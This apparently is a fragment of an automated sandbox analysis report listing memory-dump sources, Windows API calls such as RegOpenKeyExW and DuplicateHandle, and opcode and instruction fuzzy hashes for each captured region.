• Source File: 00000005.00000002.520981828.00000000011E0000.00000040.00000010.sdmp, Offset: 011E0000, based on PE: false
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: efe3a88465d347f1c0d2c50138cb1c2946443b09c76b991e640fb53170ffaf7f
• Instruction ID: 4c3e86e20951f8c65135d9ec363fd58ca585b3a11477b8f1e495a43072f2de6d
• Opcode Fuzzy Hash: efe3a88465d347f1c0d2c50138cb1c2946443b09c76b991e640fb53170ffaf7f
• Instruction Fuzzy Hash: DE31EEB1D006689FCB14CFDAC988ADEBFF5BF48314F55842AE819AB210D7749905CFA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 011E930C
Memory Dump Source
• Source File: 00000005.00000002.520981828.00000000011E0000.00000040.00000010.sdmp, Offset: 011E0000, based on PE: false
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 747d73ea2331d535236399cbcd321569e757f9b2adeb73721552b64ba1d546e2
• Instruction ID: c7d9987b4ea672a4b9a73118ac2a0b26b160cfe2ed2c234963e6868ad49dbff9
• Opcode Fuzzy Hash: 747d73ea2331d535236399cbcd321569e757f9b2adeb73721552b64ba1d546e2
• Instruction Fuzzy Hash: 4631E3B0D046498FDB14CFD9C588ACEFBF5AF48304F28856AE809AB341C7759945CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlEncodePointer.NTDLL(00000000), ref: 013EC422
Memory Dump Source
                                                                      • Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EncodePointer
                                                                      • String ID:
                                                                      • API String ID: 2118026453-0
                                                                      • Opcode ID: 2b690d2cfba6a64323b3e075489d49eaf94db486acbb0bdb127157e28ac911cf
                                                                      • Instruction ID: a83b353b63a31da34924b863906461dc77ef68c7fbe8555476bf0d8e882329c6
                                                                      • Opcode Fuzzy Hash: 2b690d2cfba6a64323b3e075489d49eaf94db486acbb0bdb127157e28ac911cf
                                                                      • Instruction Fuzzy Hash: 4131E0B58047958FDB11DFA9E40979EBFF4EF05308F148969E448B3282C779A508CF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013E6E5F
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 5cc6e52d21b71057ff93482ae80f05c7b092c4b69b7cb04bb1328127812b7857
                                                                      • Instruction ID: aa4f7c74bbe38200a9359fd94761bf668e43bdaa00e661c83bf38b3d35b5b6bc
                                                                      • Opcode Fuzzy Hash: 5cc6e52d21b71057ff93482ae80f05c7b092c4b69b7cb04bb1328127812b7857
                                                                      • Instruction Fuzzy Hash: 9121C4B5900318AFDF10CFA9D984ADEBBF8EB58324F14841AE918A7350D374A954CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013E6E5F
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 402ae7e374ac3655360e172b5eafff1ec4c51aa4c84d8d35e6a5ca71d851766d
                                                                      • Instruction ID: 5d7d2c60e191ff7ebd6b4489e675a24540f0f2ed2f76ad403693bc5ebdbb495b
                                                                      • Opcode Fuzzy Hash: 402ae7e374ac3655360e172b5eafff1ec4c51aa4c84d8d35e6a5ca71d851766d
                                                                      • Instruction Fuzzy Hash: 2421C4B59003189FDF10CFA9D584ADEBBF8EB58324F14841AE918A7350D374A954CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.520981828.00000000011E0000.00000040.00000010.sdmp, Offset: 011E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 6e52edd215cf7b09010c021353c1c3e7ff074408211c7fdfd50881edd3c773e8
                                                                      • Instruction ID: 583750e33a3d7f58c0952284d7078c8f4ecafc9ce5ad13ebbb55ad452387d37c
                                                                      • Opcode Fuzzy Hash: 6e52edd215cf7b09010c021353c1c3e7ff074408211c7fdfd50881edd3c773e8
                                                                      • Instruction Fuzzy Hash: 2B219A70909648DFCB19EFB8D4A8A9DBBF2FF88314F158468D401AB391EB319885CF55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlEncodePointer.NTDLL(00000000), ref: 013EC422
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EncodePointer
                                                                      • String ID:
                                                                      • API String ID: 2118026453-0
                                                                      • Opcode ID: 7241464e90e9006d10bdc73d45f3f3d1a74fa291fb563cb990c34153e232af0b
                                                                      • Instruction ID: 8d3539fad3774a751a7cfc7c431108825cdbd59f1a98bc356b66e3998c3aabd3
                                                                      • Opcode Fuzzy Hash: 7241464e90e9006d10bdc73d45f3f3d1a74fa291fb563cb990c34153e232af0b
                                                                      • Instruction Fuzzy Hash: 21114AB19007558FDB10DFA9D50979EBBF4EB44718F248929E409B3641D778A604CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.521729563.000000000137D000.00000040.00000001.sdmp, Offset: 0137D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 338734f8d302180425d95089a909f6bec17f456e6046dd2306fc8ef14e73bc7c
                                                                      • Instruction ID: e682af4d7124c55863d0ad6b656ca44c9c99db00173b18fbed9aede8c639136b
                                                                      • Opcode Fuzzy Hash: 338734f8d302180425d95089a909f6bec17f456e6046dd2306fc8ef14e73bc7c
                                                                      • Instruction Fuzzy Hash: 00210371500244DFDB21DF94D9C0F6ABF6AFF8432CF248969E8094B246C33AD45ACBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.521729563.000000000137D000.00000040.00000001.sdmp, Offset: 0137D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b69c55c0103e3f0194d56463a8785c1bfd4348e56e195bde2589287191739a80
                                                                      • Instruction ID: 9313e8a47a6c63be1c254a35958276509ff3d6e55b3a0d3148a2bfbd34e69eb4
                                                                      • Opcode Fuzzy Hash: b69c55c0103e3f0194d56463a8785c1bfd4348e56e195bde2589287191739a80
                                                                      • Instruction Fuzzy Hash: 6421F471504244DFDB21DF94D9C0B67BB69FF84328F248569E8051A606C73AE459C7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.521803376.000000000138D000.00000040.00000001.sdmp, Offset: 0138D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b17b740070dbd69414999051744b75368385f4f35708a074c96fd077944405a2
                                                                      • Instruction ID: 07ce1af198a0cc45f6d91a04cb54edca76586012748d2c9945c1f85a5103b89d
                                                                      • Opcode Fuzzy Hash: b17b740070dbd69414999051744b75368385f4f35708a074c96fd077944405a2
                                                                      • Instruction Fuzzy Hash: B32100B1604344DFDB15EF94D8C4B16BB69FB84268F20C969E84A4B686C336D84BCB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.521729563.000000000137D000.00000040.00000001.sdmp, Offset: 0137D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b220346838b617afc249cfd39a22b485ab4c3c01a0c1e966dd926474b5198b28
                                                                      • Instruction ID: 16f8cea33ec56556be2373b4caaaa9c4bfe6f971f1efc5e065715435f3c5c7d0
                                                                      • Opcode Fuzzy Hash: b220346838b617afc249cfd39a22b485ab4c3c01a0c1e966dd926474b5198b28
                                                                      • Instruction Fuzzy Hash: 2F11B176504280CFCB12CF54D5C4B16BF72FF84328F2486A9D8494B656C33AD45ACBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.521729563.000000000137D000.00000040.00000001.sdmp, Offset: 0137D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b220346838b617afc249cfd39a22b485ab4c3c01a0c1e966dd926474b5198b28
                                                                      • Instruction ID: f3afd0f95ff0bcf7fceeea87f8257d57d87fa1964886b9a5d9671910031865c7
                                                                      • Opcode Fuzzy Hash: b220346838b617afc249cfd39a22b485ab4c3c01a0c1e966dd926474b5198b28
                                                                      • Instruction Fuzzy Hash: DF11BE76504280DFDB12CF54D9C4B16BF72FF84328F2886A9D8054B657C33AE45ACBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.521803376.000000000138D000.00000040.00000001.sdmp, Offset: 0138D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 97667016c062c97266623d2c50188c71d14a0f74471c64901586c743aa3c0651
                                                                      • Instruction ID: 99f43612f957a9300b0ae5909673d6567bb13401956276ec11afc91dc338d24e
                                                                      • Opcode Fuzzy Hash: 97667016c062c97266623d2c50188c71d14a0f74471c64901586c743aa3c0651
                                                                      • Instruction Fuzzy Hash: 6411BEB5504380CFDB12DF54D5C4B16BB61FB84318F24C6A9D8494B696C33AD45BCB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions